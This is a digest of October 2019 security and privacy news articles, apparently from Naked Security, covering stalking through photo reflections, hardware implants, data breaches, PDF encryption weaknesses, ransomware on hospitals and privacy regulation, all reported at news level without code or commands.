Repairs & Upgrades

October 14, 2019 »

Stalker found pop star by searching eyes’ reflections on Google Maps

By Lisa Vaas

A predator has confessed to stalking and attacking a young Japanese pop star by zooming in on the reflections in her eyes from photos she posted on social media.

Oriental Daily reports that 21-year-old Japanese idol Matsuoka Nagato was attacked on her way home by someone who covered her head with a towel, wrestled her to the ground and physically assaulted her, injuring her face in the struggle.

A 26-year-old man by the name of Sato was arrested and confessed to police that he’d used the star’s selfies to figure out where she lived. Each of her pupils reflected the nearby streetscape, which he plugged into the street map function of Google Map to find out matching bus stops and scenery.

Sato told police that he waited at Matsuoka’s bus stop until his victim showed up, then followed her home on the night of 1 September.

He also confessed to observing other reflections in Matsuoka’s eyes: curtains, windows, and the angle of the sun. That enabled Sato to guess at which floor she lived on in the building.

AsiaOne notes that there have been several high-profile stalking and assault cases of J-pop stars in recent years, and fans have called for better protection of their female idols as a result. Such incidents have included one against Maho Yamaguchi, ex-member of pop group NGT48, who spoke out in January about an alleged assault in which two men entered her home and tackled her.

For her part, singer Mayu Tomita tried to report a stalker 12 days before he stabbed her 34 times. Leading up to the attack, police had dismissed the threat, in spite of Tomita telling them that she was getting several social media messages a day, threatening to kill her.


Soldering spy chips inside firewalls is now a cheap hack, shows researcher

By John E Dunn

The tiny ATtiny85 chip doesn’t look like the next big cyberthreat facing the world, but sneaking one on to a firewall motherboard would be bad news for security were it to happen.

In fact, this has already happened as part of a project by researcher Monta Elkins, designed to prove that this sort of high-end hardware hack is no longer the preserve of nation-states.

Elkins soldered the 5mm x 5mm ATtiny85 chip from an Arduino board to his test firewall’s circuit board just in front of the system’s serial port.

After reading his account of the proof of concept in Wired, it’s not hard to grasp why soldering tiny chips to circuit boards is a threat – they’re impossible to see let alone detect once they’re installed inside equipment.

The proof of concept is also cheap, requiring little more than some knowhow, access to the supply chain of current products, and a few hundred dollars for parts.

Rumors of secret chips, or secret interfaces on legitimate chips, have long been the stuff of legend, but the implication of Elkin’s work is that anyone could now do this.


Computing enthusiast cracks ancient Unix code

By Danny Bradbury

Old passwords never die – they just become easier to decode. That’s the message from a tight-knit community of tech history enthusiasts who have been diligently cracking the passwords used by some of the original Unix engineers four decades ago.

On 3 October, an enthusiast on the Unix Heritage Society mailing list asked a question about cracking passwords stored in old Unix systems. The source code for various revisions of Unix from the seventies onward is available online for anyone to download, and these revisions store the passwords for various staff members in the etc./passwd file.

Unix hashed these passwords by running them through an algorithm called descrypt (also known as crypt (3)), which used the original DES encryption algorithm and limited the password length to eight characters. This was good enough to stop people recovering the password from the original hashes at the time, but 40 years on, computers are a little bit faster.

Developer Leah Neukirchen replied that she’d cracked several of them contained in a version of the BSD operating system from January 1980. However, she still hadn’t managed to crack Ken Thompson’s password. Thompson is one of the fathers of Unix. His original work on its predecessor Multics formed the basis for much of the operating system.

Neukirchen complained:

I never managed to crack Ken’s password with the hash ZghOT0eRm4U9s, and I think I enumerated the whole 8 letter lowercase + special symbols key space.


Hacker wants $300 for 250,000 records stolen from sex worker site

By Lisa Vaas

A hacker has stepped through a hole in vBulletin web software to steal all email addresses from a Dutch website for prostitution and escort customers and for sex workers themselves,

According to local news outlet NOS, the total number of accounts whose email addresses were exposed is 250,000. Besides the email addresses, the hacker also got at user names, IP addresses and passwords, NOS reports.

The passwords are reportedly encrypted. We don’t have details of exactly how they’re encrypted, but as we reported in June, vBulletin is one of the content management systems (CMSes) that are properly securing passwords. That means that it’s doing hashing right – hashing being one part of the encrypting/hashing/salting recipe for securing passwords – by using bcrypt, a password hashing function that’s resistant to GPU-based parallel computing cracks.

(Here’s a primer on how to securely store users’ passwords that delves into the details.)

On Thursday, the site’s main moderator announced the breach and advised users to change their login details, in spite of passwords apparently not being affected.

According to the notification, found out about the breach from its external software supplier, vBulletin, which reported that a software error was discovered in its software that gave access to the site’s database. said that vBulletin took action “as quickly as possible,” releasing a software patch that the site tested and promptly implemented.

The moderator said that the hacker has put the email addresses up for sale online. NOS said that they’re asking $300.

Visitors to swap experiences and tips on the site. Prostitution is legal, and heavily regulated, in the Netherlands. But that doesn’t mean that visitors to want their association with the industry to be publicly broadcast, be they sex workers or clients.


Most Americans don’t have a clue what https:// means

By Lisa Vaas

55% of US adults couldn’t identify an example of 2FA, and only 30% knew that starting a URL with https:// means that the information sent to that site is encrypted.

… and the Pew Research Center discovered plenty of other sobering facts about what Americans know and don’t know about cybersecurity and privacy.

The survey

The Pew Research Center conducted a survey which tested Americans and their digital knowledge, asking 4,272 adults in the US a series of 10 questions about a range of digital topics, such as cybersecurity or who the bearded guy in the photo was (answer: Twitter co-founder Jack Dorsey. Only 15% got that one right, but how that fits into cybersecurity and privacy concerns is a question that Pew didn’t address.)

How well the respondents did depended a great deal on what the topic, term or concept was, as well as how old they were and what their level of educational attainment was. Young people, you did better. College-educated people, you did better, too.

Respondents did A+ work when it came to identifying where you can get phished, for example. In an email? On social media? In a text message? On a website? Or how about the correct answer: “all of the above?” Ding-ding-ding, we have a winner! 67% of Americans knew that you can get phished all over the place.

Respondents aced the question about what cookies are, as well – 62% correctly said that websites that use cookies can track your visits and activity on the site.

Where we fall flat on our 2FA faces

Here’s where we aren’t so smart: only 28% of adults could identify an example of 2FA, which is one of the most important ways that people can protect their personal information on sensitive accounts.

To be fair, the question tossed a number of images of security strategies together: if you go to pages 14-15 of the survey, which you can download here, you’ll see that respondents were asked to pick the image that represented 2FA.


Hackers bypassing some types of 2FA security FBI warns

By John E Dunn

Some types of two-factor authentication (2FA) security can no longer be guaranteed to keep the bad guys out, the FBI is reported to have warned US companies in a briefing note circulated last month.

FBI reporting identified several methods cyber actors use to circumvent popular multi-factor authentication techniques in order to obtain the one-time passcode and access protected accounts.

The simplest and therefore most popular bypass is SIM swap fraud, in which the attacker convinces a mobile network (or bribes an employee) to port a target’s mobile number, allowing them to receive 2FA security codes sent via SMS text.

Naked Security now regularly covers this kind of hack, almost always because it was used to empty people’s bank accounts, steal cryptocurrency from wallets or exchange accounts, or to attack services such as PayPal.

From the victim’s point of view, it’s the ultimate gotcha – a security weakness caused by the failings of a service provider they can do little to prevent.

A second technique is the man-in-the-middle phishing attack that tricks people into entering their credentials and OTP code into a fake site which then instantly passes it to the real one. A good example of this is last months’ attack on YouTube users, some of whom had 2FA turned on.

More advanced still is session hijacking where the site is genuine, but the credentials and codes are stolen from traffic travelling to and from the user.

According to the FBI, in one case from 2019, a security vulnerability on the website of a bank allowed a hacker to bypass PIN and security questions after phishing basic credentials.


October 10, 2019 »

Twitter used 2FA phone numbers for targeted advertising

By John E Dunn

Does Twitter know your email address and your phone number?

Depending on how long ago you started using Twitter, it’s a near certainty the company has at least one of these – the email address – because people often hand that over when registering.

As for phone numbers (usually mobile numbers) these are entered to enable Twitter’s two-factor authentication (2FA) security, Login Verification.

We mention this because Twitter this week made the you have to be kidding admission that it might have “inadvertently” handed this data from some users to advertisers as part of the company’s Tailored Audiences system that targets users’ feeds with ads.

As apologies go, this one is unsatisfactory, particularly if you like Twitter but think ‘targeted’ ads sound intrusive:

We’re very sorry this happened and are taking steps to make sure we don’t make a mistake like this again.

Twitter glosses over some of the detail so let’s explain how Tailored Audiences is supposed to work.


California outlaw’s facial recognition in police bodycams

By Lisa Vaas

On Tuesday, California passed into law a three-year block of the use of facial recognition in police bodycams that turns them into biometric surveillance devices.

This isn’t surprising, coming as it does from the state with the impending, expansive privacy law – California’s Consumer Privacy Act (CCPA) – that’s terrifying data mongers.

As it is, in May, San Francisco became the first major US city to ban facial recognition. It might well be a tech-forward metropolis, in a state that’s the cradle of massive data gobbling companies, but lawmakers have said that this actually confers a bit of responsibility for reining in the privacy transgressions of the companies headquartered there.

When facial recognition gets outlawed, lawmakers point to the many tests that have found high misidentification rates. San Francisco pointed to the ACLU’s oft-cited test that falsely matched 28 members of Congress with mugshots.

The ACLU of Northern California repeated that test in August, finding that the same technology misidentified 26 state lawmakers as criminal suspects.

One of the misidentified was San Francisco Assemblyman Phil Ting, the lawmaker behind the bill that passed and which was signed into law by Gov. Gavin Newsom on Tuesday: AB1215.

The law, which goes into effect on 1 January 2020 and which expires on 1 January 2023, prohibits police from “installing, activating, or using any biometric surveillance system in connection with an officer camera or data collected by an officer camera.”


Job seekers are scrubbing clean their social media accounts

By Lisa Vaas

We’re thrilled to pass along the findings of a new report that says that job seekers are doing what we’ve been begging them (as well as those people who are just fine with their current jobs, thank you very much) to do for years: button down privacy on their social media accounts, and mop up the splatter tracks of their nonprofessional galivanting if they want to keep it from squashing their career opportunities.

After all, while we’re all for free speech, those rights don’t stop bosses from firing us if we publicly diss them or the company, and they don’t mean that recruiters are required to consider your candidacy if you do something like bad-mouth a previous employer on social media.

The finding comes from JDP, a candidate screening company in the US that surveyed 2,007 US participants about what they’re hiding from employers and how far they’ll go to keep it hidden.

According to its latest study, 43% of respondents enable privacy settings to keep material hidden from current employers and from whatever social media screenings future employers might run on them. In fact, one in four have every platform set to private. Forty percent of respondents say they’ve gone so far as to create alias accounts.

It’s not that they’re not posting career landmines: one in five admit to posting material that could jeopardize a current or future opportunity, JDP found.


October Patch Tuesday: Microsoft fixes critical remote desktop bug

By Danny Bradbury

Microsoft fixed 59 vulnerabilities in October’s Patch Tuesday, including several critical remote code execution (RCE) flaws.

One of the most significant was a flaw (CVE-2019-1333) in the company’s Remote Desktop Client that enables a malicious server to gain control of a Windows computer connecting to it. An attacker could accomplish this using social engineering, DNS poisoning, a man-in-the-middle attack, or by compromising a legitimate server, Microsoft warned. Once they compromised the client, they could execute arbitrary code on it.

Another critical RCE vulnerability affected the MS XML parser in Windows 8.1, Windows 10, Windows Server 2012 through 2019, and RT 8.1. An attacker can trigger the CVE-2019-1060 flaw through a malicious website that invokes the parser in a browser.

A memory corruption bug in Edge’s Chakra scripting engine (CVE-2019-1366) also enables a malicious website to trigger RCE, operating at the user’s account privileges, while an RCE vulnerability in Azure Stack, Microsoft’s on-premises extension of its Azure cloud service, escapes the sandbox by running arbitrary code with the NT AUTHORITY\system account.

The company also patched a critical RCE bug in VBScript that lets an attacker corrupt memory and take control of the system, usually by sending an ActiveX control via a website or Office document. Hopefully bugs in VBScript will become less important over time now that the company has deprecated the language.


Deepfakes have doubled, overwhelmingly targeting women

By Lisa Vaas

OK, let’s pull deepfakes back from the nail-biting, perhaps hyperbolic, definitely hyperventilating, supposed threats to politicians and focus on who’s really being victimized.

Unsurprisingly enough, according to a new report, that would be women.

96% of the deepfakes being created in the first half of the year were pornography, mostly being nonconsensual, mostly casting celebrities – without compensation to the actors, let alone their permission.

The report, titled The State of Deepfakes, was issued last month by Deeptrace: an Amsterdam-based company that uses deep learning and computer vision for detecting and monitoring deepfakes and which says its mission is “to protect individuals and organizations from the damaging impacts of AI-generated synthetic media.”

According to Deeptrace, the number of deepfake videos almost doubled over the seven months leading up to July 2019, to 14,678. The growth is supported by the increased commodification of tools and services that enable non-experts to churn out deepfakes.

One recent example was DeepNude, an app that used a family of dueling computer programs known as generative adversarial networks (GANs): machine learning systems that pit neural networks against each other in order to generate convincing photos of people who don’t exist. DeepNude not only advanced the technology, it also put it into an app that anybody could use to strip off (mostly women’s) clothes so as to generate a deepfake nudie within 30 seconds.

We saw another faceswapping app, Zao, rocket to the top of China’s app stores last month, sparking a privacy backlash and just as quickly getting itself banned from China’s top messaging app service, WeChat.

While Deeptrace says most deepfakes are coming from English-speaking countries, it says it’s not surprising that it’s seeing “a significant contribution to the creation and use of synthetic media tools” from web users in China and South Korea.

Deeptrace says that non-consensual deepfake pornography accounted for 96% of the total number of deepfake videos online. Since February 2018 when the first porn deepfake site was registered, the top four deepfake porn sites received more than 134 million views on videos targeting hundreds of female celebrities worldwide, the firm said. That illustrates what will surprise approximately 0% of people: that deepfake porn has a healthy market.


TOMS hacker tells people to log off and enjoy a screenless day

By Lisa Vaas

TOMS seems like a really nice shoe company, and it just got hacked in a really nice way.

Motherboard Vice reports that on Sunday, a hacker going by the name Nathan emailed TOMS subscribers and told them to log off, go out and enjoy the day:

hey you, don’t look at a digital screen all day, there’s a world out there that you’re missing out on.

just felt some people need that.

CEO Jim Alling acknowledged the hack in an email to customers, telling them that an unauthorized email was sent out to the TOMS community by “an individual who gained access to a TOMS account in a third-party system.”

The company is asking members of its mailing list to refrain from clicking on any links or replying to the pleasant but unauthorized and illegal message.

TOMS is investigating the incident, but Alling said that the company immediately took steps to deactivate the account and implement additional layers of account security. He said that TOMS had spent 24 hours doing “close examination” with the company’s partners, but so far, it doesn’t look like full payment card details were accessed or that TOMS’ marketing customer email list was downloaded.

Well, no, why would he have done that? That would have taken a lot of time. Plus it would have been rude, Nathan told Vice:

I had TOMS hacked for quite a while, but with a busy life and no malicious intent, it was pretty useless to have them hacked.

Of course, he could have just responsibly disclosed whatever security hole he exploited, but for reasons he didn’t give, Nathan didn’t consider that an option:

By this point responsible disclosure is not a option. So I thought I [may] as well send out a message I believe in just for fun. End purpose was to spread my message to a large amount of people.


October 8, 2019 »

Nationwide facial recognition ID program underway in France

By Lisa Vaas

France is creating – and speeding up the rollout of – a nationwide program using facial recognition to create legal digital identities for its citizens.

The program is called Alicem – an acronym for “certified online authentication on mobile”. It was developed jointly by the Ministry of the Interior and the National Security Title Agency (ANTS), which maintain that it’s going to a) simplify getting online services while b) fighting identity theft, c) keeping the biometric data safe on the phone, making it disappear after validating identity, and d) not letting third parties get at the data.

France had planned to launch the Android-only app by Christmas. But now, it’s greasing the wheels and plans to have it up and running in November 2019, Bloomberg reports.

Privacy watchdogs are not pleased

The country’s privacy regulator, CNIL, says the program breaches the EU’s rule of consent. Europe’s General Data Protection Regulation (GDPR) mandates free choice. Bloomberg spoke to Emilie Seruga-Cau, the head of law enforcement at CNIL, who said that the independent regulator has made its concerns “very clear.”

The publication, which was able to check out the app, reports that Alicem will be the only way for French citizens to create a legal digital ID, and facial recognition will be the only way to do it.

It will require that residents use an Android app to take one-time selfie videos that capture their expressions and movements at different angles, to compare with photos of themselves stored in their biometric passports.

Meanwhile, the French privacy rights group La Quadrature du Net (LQDN) has filed a lawsuit over the program in France’s highest administrative court.


Facebook’s Libra cryptocurrency dealt blow by PayPal’s departure

By John E Dunn

Has PayPal just dealt a body blow to Facebook’s Libra cryptocurrency?

In emails sent to journalists last week, the company abruptly announced that it was leaving the Libra Association, the 28-strong organization of global companies and non-profits, including Facebook, set up to oversee its roll out.

Given that Libra was only announced in June, with a proposed launch in 2020, to the untrained eye this will look like an unexpected change of heart.

Adopting the principle of the less said the better, the company offered no explanation as to why it decided to bail from Libra so quickly, stating only that:

PayPal has made the decision to forgo further participation in the Libra association at this time and to continue to focus on advancing our existing mission and business priorities as we strive to democratize access to financial services for underserved populations.

But, of course:

We remain supportive of Libra’s aspirations and look forward to continued dialogue on ways to work together in the future.

While it’s true that Libra still has 27 backers, losing PayPal at this stage is a bit like discovering your quarterback has gone on vacation the night before the Super Bowl.

Adding to the instability is an unconfirmed report in The Wall Street Journal that two other founder members, MasterCard and Visa, might also be reconsidering their involvement.


Android devices hit by zero-day exploit Google thought it had patched

By John E Dunn

Google has admitted that some Android smartphones have recently become vulnerable to a serious zero-day exploit that the company thought it had patched for good almost two years ago.

The issue came to light recently when the Google’s Threat Analysis Group (TAG) got wind that an exploit for an unknown flaw, attributed to the Israeli NSO Group, was being used in real-world attacks.

Digging deeper into the exploit’s behavior, Project Zero researcher Maddie Stone said she was able to connect it to a flaw in Android kernel versions 3.18, 4.14, 4.4, and 4.9 that was fixed in December 2017 without a CVE being assigned.

Somehow, that good work was undone in some later models – or never applied in the first place – leaving a list of vulnerable smartphones running Android 8.x, 9.x and the preview version of 10.

The flaw is now identified as CVE-2019-2215 and described as a:

Kernel privilege escalation using a use-after-free vulnerability, accessible from inside the Chrome sandbox.

The result? Full compromise of unpatched devices, probably served from a malicious website without the need for user interaction, in conjunction with one or more other exploits. It also requires that the attacker has installed a malicious app.


Facebook urged by governments to halt end-to-end encryption plans

By Danny Bradbury

Tensions between Facebook and three governments escalated last week after the US, the UK, and Australia officially urged Facebook to halt its plans for end-to-end encryption.

The row concerned Facebook CEO Mark Zuckerberg’s publication of a privacy manifesto in March this year, in which he promised to extend the company’s end-to-end encryption work and introduce the technology into its core Facebook Messenger product.

A thorn in their sides

An online messaging service can encrypt your data in two ways. It can store the encryption key on the provider’s own servers, enabling law enforcement to subpoena it and unlock your messages. Alternatively, end-to-end encryption stores the key to a messaging session exclusively on the participating computers, meaning that the tech company has nothing to give the authorities. This means that even if law enforcement accesses a person’s messages, they wouldn’t be able to read the contents.

End-to-end encryption is a thorn in the side of governments who want to track criminals. On Friday, US Attorney General William Barr published an open letter to Zuckerberg, cosigned by UK Home Secretary Priti Patel, acting United States Secretary of Homeland Security Kevin McAleenan, and Australian Home Affairs Minister Peter Dutton. It laid out its demands clearly in the first paragraph:

We are writing to request that Facebook does not proceed with its plan to implement end-to-end encryption across its messaging services without ensuring that there is no reduction to user safety and without including a means for lawful access to the content of communications to protect our citizens.


Social media platforms can be forced to delete illegal content worldwide

By Lisa Vaas

Individual countries can order Facebook and similar content providers to take down posts, photos and videos worldwide, not just in their own countries, Europe’s top court said on Thursday.

Facebook can’t challenge this decision, which extends the EU’s internet-related laws beyond its own borders.

In Thursday’s decision, the EU Court of Justice said that platforms can be ordered to remove not just a copy of illegal content that somebody’s complained about. They can also be ordered to proactively seek out all identical copies of the content and scrub them too, rather than sitting back and waiting for every instance to be reported.

What it means: copies of defamatory or other illegal content that’s posted to secret places – private groups on Facebook, for example – can’t hide away from the scrub brush.

The ruling stemmed from a case filed in 2016. It involved a comment made on Facebook about an Austrian politician – Eva Glawischnig-Piesczek, former leader of the Austrian Green Party – that an Austrian court decreed was insulting and defamatory. As the New York Times reports, she sued the social network to expunge online comments that called her a “lousy traitor,” “corrupt oaf” and member of a “fascist party.”

Facebook initially refused to take down the post. Glawischnig-Piesczek started in Austrian courts, suing Facebook over the matter. After Austrian courts concluded that the comments were defamatory and reputation-damaging, Glawischnig-Piesczek demanded that Facebook erase the original comments worldwide, not just within the country, as well as posts with “equivalent” remarks.

She took the case on up to the top EU court, the European Court of Justice.


October 7, 2019 »

Wi-Fi signals let researchers ID people through walls from their gait

By Lisa Vaas

Yasamin Mostofi asks us to imagine this scenario: police have video footage of a robbery. They suspect that one of the robbers is hiding in a house nearby.

Can a pair of off-the-shelf Wi-Fi transceivers, located outside the house, look through the walls to see who’s inside?

That’s easy to answer, since we’ve seen it done before.

In 2015, MIT researchers created a device that can discern where you are and who you are, detecting gestures and body movements as subtle as the rise and fall of a person’s chest, from the other side of a house, through a wall, even though subjects were invisible to the naked eye, by using the human body’s reflections of wireless transmissions.

Then, 11 months ago, a team of researchers at University of California Santa Barbara demonstrated using a streamlined set of technologies – just a smartphone and some clever computation – how to see through walls and successfully track people in 11 real-world locations, with high accuracy.

But here’s a new question: Can Wi-Fi signals be used to identify the person in the house? Can off-the-shelf hardware determine if whoever’s in the house is one of the people in the video surveillance footage police are scrutinizing?

Yes. UC Santa Barbara researchers are back again to show that they’ve built on their previous work: It can be done by analyzing people’s walking gaits and comparing them to the gait of whoever’s in the CCTV footage.


Buying a new laptop? Here’s how to secure it

By Maria Varmazis

October is National Cybersecurity Awareness Month (NCSAM) and this year’s theme of ‘Own IT. Secure. IT. Protect IT.’ aims to encourage personal accountability for security. Computer security is a broad and complex subject but the truth is that criminals like low-hanging fruit and getting the basics right affords you an awful lot of protection.

Naked Security asked me to come up with an easy to follow guide that will help you get the security basics right if you’re buying a new laptop.

1. Have a plan for your data

Ah, the thrill of buying a new laptop. It’s so much faster than your last one! It can do all these great new things! It has so much more space! New lid space for stickers!

Well, it’s thrilling if it was planned, that is.

Often enough we end up buying a new laptop in something of an emergency situation, when the old one is finally so slow that it’s unusable or has a catastrophic failure. When the old laptop’s breakdown is a bit sudden, you might be caught trying to do data rescue on a fried computer, which is a frustrating and time-consuming situation at best.

Spare future-you a lot of grief by making sure you keep your data freshly backed up in at least one place, separate from your old laptop. This can include cloud-synced backups via services like DropBox, Carbonite, or iCloud, or physical periodic backups onto an external hard drive. Mac users can do this on a schedule via Time Machine, and Windows 10 offers its own automatic backup option under “Backup and Restore” in the Control Panel. Additionally, many external hard drive makers bundle their own backup software with the hard drives they make.

So yes, back it all up, in one place, so you know you have everything that you need without the time pressure and frustration of trying to dig it all out from a dead or dying hard drive.


WhatsApp vulnerability could compromise Android smartphones

By John E Dunn

A researcher has released details of a WhatsApp remote code execution (RCE) flaw it is claimed could be used to compromise not only the app but the mobile device the app is running on.

Reported to Facebook some weeks ago by a researcher called ‘Awakened’, the critical issue (CVE-2019-11932) affects users of the Android versions of the app, specifically versions 8.1 and 9.0 although not, apparently, version 8.0 (Apple’s iOS doesn’t appear to be affected).

It’s described as a double-free memory vulnerability in a WhatsApp image preview library called, and some aspects of how it might execute remain unclear.

The researcher says an attack would involve first sending a malicious GIF image using any channel, that is by email, a rival messaging app, or sent direct through WhatsApp itself.

If WhatsApp is being used, and the attacker (or hapless intermediary) is on the contacts list of the user as a friend, apparently this GIF would download to the device automatically.

Execution would happen when the recipient subsequently opens the WhatsApp Gallery even if no file is selected or sent. Writes Awakened:

Since WhatsApp shows previews of every media (including the GIF file received), it will trigger the double-free bug and our RCE exploit.

To back this up, Awakened has released a video showing the sequence of events running on WhatsApp v2.19.203.


£3 billion Safari iPhone privacy lawsuit given go-ahead

By Danny Bradbury

A UK class action privacy lawsuit against Google can go ahead, according to the UK Court of Appeal. The suit claims up to £3bn ($3.9bn) in damages based on Google’s manipulation of Apple’s Safari browser in 2011-12.

In 2010, Apple included anti-tracking technology in Safari that would stop advertising companies from inserting cookies into the browser.

Google developed a workaround, enabling it to put cookies from its DoubleClick advertising technology into users’ browsers anyway. Safari’s anti-tracking technology at the time made an exception for sites that users interacted with, so Google included code in advertisements that made it look as though the user was filling out a form.

This technique enabled the company to place cookies in Safari. Those small files could tell when the user visited a site participating in the DoubleClick advertising program, how long they spent on the site, what pages they visited, and in some cases even their rough geographic location.

The complaint calls this data ‘browser generated information’ or BGI, and says that over time it allowed Google to draw more conclusions about people, helping it to understand things like their sexual orientation, religious views, and political leanings. The company used this data to segment people into customer groups, which it used to target them with advertisements from its customers. So, in other words, Google bypassed Apple’s technology protections to carry on its advertising operations as usual.


Hacker’s parents sentenced for selling his cryptocurrency

By Lisa Vaas

All you brilliant kids who use your fine brains to do idiotic things like, say, hack TalkTalk and the EtherDelta exchange, do yourself a favor: when you wind up in jail, warn your parents not  to “help” you by transferring your stolen cryptocurrency.

That’s what happened to TalkTalk and (alleged) EtherDelta hacker Elliott Gunton, whose parents have both been handed suspended sentences after admitting to having removed some of his ill-gotten cryptocurrency from a hardware wallet.

It was a “misguided” attempt to help him, according to what Judge Stephen Holt told mom and dad, Carlie Gunton and Jason Gunton, on Wednesday. The Eastern Daily Press – a local paper in the Guntons’ hometown of Norwich, in the English county of Norfolk – quoted the judge:

You misguidedly tried to help your son and what you did didn’t help him at all, and I’m sure it’s something you’re regretful about.

History of a youthful, repeat offender

Elliott Gunton, now 20, was convicted in 2016 at the age of 16 for his role in attacking the UK broadband and telecom giant TalkTalk.

In 2017, the UK’s Information Commissioner’s Office (ICO) fined TalkTalk £400,000 for security failings that led to the attack and which allowed customer data to be accessed “with ease”. The attacker accessed the personal information of more than 150,000 customers, including the sensitive financial data of more than 15,000 people (sensitive data that TalkTalk’s CEO, bizarrely enough, had said that the company wasn’t required to encrypt).


October 3, 2019 »

No federal privacy law will make it in the US this year, sources say

By Lisa Vaas

You know about that one, much-hemmed-and-hawed-over, GDPR-ish, national, US privacy law? The one we don’t have? The lack of which means the country’s data privacy landscape is made up of a crazy quilt of state laws?

Not happening. Not this year.

In spite of the US Federal Trade Commission (FTC) marching down to Capitol Hill to beat the drum for a unified federal privacy law (and more regulatory powers to enforce it), and in spite of both the House and Senate holding hearings on privacy legislation, transparency about how data is collected and shared, and the stiffening of penalties for data-handling violations, the US is not likely to see an online privacy bill come before Congress this year.

That’s according to Reuters’ anonymous sources, who say that lawmakers haven’t managed to agree on issues such as whether the bill would preempt state rules.

And when we’re talking about state rules, we’re talking about the elephant in the room: California’s Consumer Privacy Act (CCPA), which goes into effect on 1 January 2020.

In lieu of a federal law – the one we’re not getting this year because nobody can agree on what it should do – the CCPA might turn into the ipso facto privacy rule of the land. Tech companies are terrified that it’s going to be strict, and it’s going to be expensive for all the companies that slurp up consumer data to track us, market at us and profit from selling our data …Or which screw up by fumbling that data, or which quietly pickpocket that data, as the case may be.

In hearings over possible privacy legislation – which neither you nor I have been invited to, fellow citizen, though tech companies have – lawmakers and online advertising representatives have grumbled about tough laws such as the CCPA and the EU’s General Data Protection Regulation (GDPR), saying that such strict laws could lead to businesses being swamped by fines and compliance costs, and that consumers have been buried in a blizzard of required notices and privacy policies they don’t bother to read.


PDF encryption standard weaknesses uncovered

By John E Dunn

You would be forgiven for thinking that encrypting PDFs, before they are stored or sent via email, keeps their contents away from prying eyes.

But according to researchers in Germany, it might be time to revisit that assumption after they discovered weaknesses in PDF encryption which could be exploited to reveal the contents of a file to an attacker.

Dubbed ‘PDFex’ (PDF exfiltration), the weaknesses documented in Practical Decryption exFiltration: Breaking PDF Encryption by researchers from Ruhr University Bochum and the Münster University of Applied Sciences, offer two attack methods, each with three variants that depend on which PDF viewer is used to open a target document.

Attack #1 – direct exfiltration

The PDF standard ships with native AES symmetric encryption which secures documents using a password communicated to the recipient (arguably a weakness in itself) or, in some installations, through public key encryption.

However, the researchers quickly discovered a hole in this method, so glaringly obvious that it’s surprising nobody’s noticed it before. The PDF standard allows for partially encrypted documents that include a mix of both encrypted and unencrypted sections, and does not include integrity checking. This means an attacker can add additional sections or interactive Actions to an encrypted PDF without raising any alarms, said the researchers in their overview:

The most relevant object for the attack is the definition of an Action, which can submit a form, invoke a URL, or execute JavaScript.

Actions can be set to run when a document is opened or something within the document is clicked on, and send the decrypted contents to an attacker’s server.


Google’s Password Manager now checks for breached credentials

By Danny Bradbury

Google has taken the next step in its strategy to secure users’ passwords. The search giant has taken a password-checking feature released early this year as an extension to its Chrome browser and embedded it directly into its password manager service.

In February, the search and advertising giant released Password Checkup, a Chrome extension that checks passwords to see if they are secure. When users enter a username and password, the extension checks a hashed version of the credentials against Google’s internal database of four billion unsafe logins. If the extension finds a match, it will warn the user and suggest that they reset their password.

Now, the company has decided to integrate this feature directly into its password manager, which is the feature in Chrome that asks if you want to save the login credentials for online services and reuse them later.


Ransomware attacks paralyze, and sometimes crush, hospitals

By Lisa Vaas

Major hospitals and some health clinics in the US and Australia have been crippled in new ransomware attacks, forcing some into emergency manual mode and one to close permanently due to extensive loss of patient healthcare records encrypted by data kidnappers.

In Australia, the toll is seven hospitals. According to an advisory issued on Tuesday by Victoria’s Department of Premier and Cabinet, a ransomware attack discovered on Monday has blocked access to several key systems, including financial management.

The hospitals and health services, which are located in Gippsland and south-west Victoria, have isolated a number of systems, taking them offline so as to quarantine the infection.

Isolating the systems has led to the shutdown of some patient record, booking and management systems, which may affect patient contact and scheduling. Where practical, some of the hospitals are reverting to manual systems to maintain patient services.

Loss of access to patient histories, charts, images and other information has forced the hospitals to rework bookings and scheduling so as to minimize disruption of service.

Meanwhile, in the US, three medical centers in western Alabama said this week that they’re not taking new patients due to a ransomware attack. According to a press release put out on Tuesday, elective procedures and surgeries scheduled for the next day – Wednesday, 2 October – would be going ahead as planned, with the centers running on “downtime” procedures that they say enable them to provide “safe and effective care” for those patients.

Current patients are staying put: they’re not being transferred to other medical centers. New admissions for critical cases are being diverted to other facilities, however. As for tests and other procedures, patients are being advised to call before they show up.


October 2, 2019 »

Ex-Yahoo engineer pleads guilty to hacking 6,000 accounts

By Lisa Vaas

A former Yahoo software engineer pleaded guilty in federal court on Monday to being a lech who broke into mostly young women’s Yahoo accounts – 6,000 of them – trying to sniff out salacious photos and videos.

According to the US Attorney’s Office for the Northern District of California, in his guilty plea, Reyes Daniel Ruiz admitted to cracking Yahoo users’ passwords and using his access to internal Yahoo systems to get at accounts, including those of his personal friends and work colleagues.

After he got into his victims’ Yahoo accounts, he’d make copies of their intimate content and stash them at home. He’d also pivot from their Yahoo accounts, branching out to break into and grope through his victims’ iCloud, Facebook, Gmail, DropBox, and other online accounts for whatever other salacious content he could find.

Yahoo saw what it thought was suspicious behavior. The Department of Justice’s press release didn’t give details of how Ruiz got wind of his former boss’s suspicions – was he confronted? Did a mass email go out, telling employees to keep their paws to themselves? – but prosecutors did say that Ruiz admitted that after Yahoo got wind of his unsavory forays, he demolished the computer and hard drive that he was using to store the ripped-off imagery.

Ruiz, 34, of Tracy, California, was indicted by a federal grand jury on 4 April 2019. He was charged with one count of computer intrusion and one count of interception of a wire communication, but under the plea agreement, he just pled guilty to the computer intrusion charge.

Ruiz is now out on a $200K bond. He’s looking at a maximum sentence of five years in prison and a fine of $250,000 plus restitution, though maximum sentences are rarely handed out. He’s scheduled to be sentenced on 3 February 2020.

Just for comparison’s sake, we can look to how much prison time the celebrity e-muggers have received as payback for prying open the iCloud and Gmail accounts of Hollywood glitterati in the Celebgate mini-series – when primary scumbags preyed on celebrities and non-celebrities alike to steal their nudes, and secondary scumbags had a field day sharing the material online.


218 million Words with Friends players lose data to hackers

By Lisa Vaas

On 12 September, Zynga released a low-key statement saying that it had been beset by an “unfortunate reality” of doing business today: PR-speak for a data breach.

Zynga – maker of addictive (and crook-tempting) online social games such as FarmVille, Mafia Wars, Café World and Zynga Poker – said at the time that it had immediately launched an investigation. The early good news: it didn’t look like any financial information had been ripped off from players of the targeted games, Words With Friends and Draw Something.

Well, that unfortunate reality has now become a lot more unfortunate: it’s 218 million account passwords worth of misfortune to the Words With Friends players whose accounts were allegedly breached.

On Sunday, Hacker News reported that it’s been in touch with the threat actor known as GnosticPlayers, who claims to be responsible for the Zynga breach.

